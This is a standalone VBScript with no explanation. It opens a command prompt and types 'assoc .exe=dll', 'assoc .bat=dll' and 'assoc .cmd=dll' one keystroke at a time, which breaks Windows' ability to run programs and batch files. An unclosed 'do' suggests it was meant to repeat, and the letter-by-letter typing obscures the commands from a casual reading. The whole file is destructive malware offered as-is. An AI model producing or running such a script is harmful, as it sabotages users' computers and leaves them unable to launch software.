do
Set wshshell = wscript.CreateObject("WScript.Shell") 
Wshshell.run "cmd" 
  wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 1
wshshell.sendkeys "s"
wscript.sleep 1
wshshell.sendkeys "s"
wscript.sleep 1
wshshell.sendkeys "o"
wscript.sleep 1
wshshell.sendkeys "c"
wscript.sleep 1
wshshell.sendkeys " "
wscript.sleep 1
wshshell.sendkeys "."
wscript.sleep 1
wshshell.sendkeys "e"
wscript.sleep 1
wshshell.sendkeys "x"
wscript.sleep 200
wshshell.sendkeys "e"
wscript.sleep 1
wshshell.sendkeys "="
wscript.sleep 1
wshshell.sendkeys "d"
wscript.sleep 1
wshshell.sendkeys "l"
wscript.sleep 1
wshshell.sendkeys "l"
wscript.sleep 1
wshshell.sendkeys "~"
wscript.sleep 1
wshshell.sendkeys "a"
wscript.sleep 1
wshshell.sendkeys "s"
wscript.sleep 1
wshshell.sendkeys "s"
wscript.sleep 1
wshshell.sendkeys "o"
wscript.sleep 1
wshshell.sendkeys "c"
wscript.sleep 1
wshshell.sendkeys " "
wscript.sleep 1
wshshell.sendkeys "."
wscript.sleep 1
wshshell.sendkeys "b"
wscript.sleep 1
wshshell.sendkeys "a"
wscript.sleep 200
wshshell.sendkeys "t"
wscript.sleep 1
wshshell.sendkeys "="
wscript.sleep 1
wshshell.sendkeys "d"
wscript.sleep 1
wshshell.sendkeys "l"
wscript.sleep 1
wshshell.sendkeys "l"
wscript.sleep 1
wshshell.sendkeys "~"
wscript.sleep 1
wshshell.sendkeys "a"
wscript.sleep 1
wshshell.sendkeys "s"
wscript.sleep 1
wshshell.sendkeys "s"
wscript.sleep 1
wshshell.sendkeys "o"
wscript.sleep 1
wshshell.sendkeys "c"
wscript.sleep 1
wshshell.sendkeys " "
wscript.sleep 1
wshshell.sendkeys "."
wscript.sleep 1
wshshell.sendkeys "c"
wscript.sleep 1
wshshell.sendkeys "m"
wscript.sleep 200
wshshell.sendkeys "d"
wscript.sleep 1
wshshell.sendkeys "="
wscript.sleep 1
wshshell.sendkeys "d"
wscript.sleep 1
wshshell.sendkeys "l"
wscript.sleep 1
wshshell.sendkeys "l"
wscript.sleep 1
wshshell.sendkeys "~"
wscript.sleep 1
wshshell.sendkeys "e"
wscript.sleep 1
wshshell.sendkeys "x"
wscript.sleep 1
wshshell.sendkeys "i"
wscript.sleep 1
wshshell.sendkeys "t"
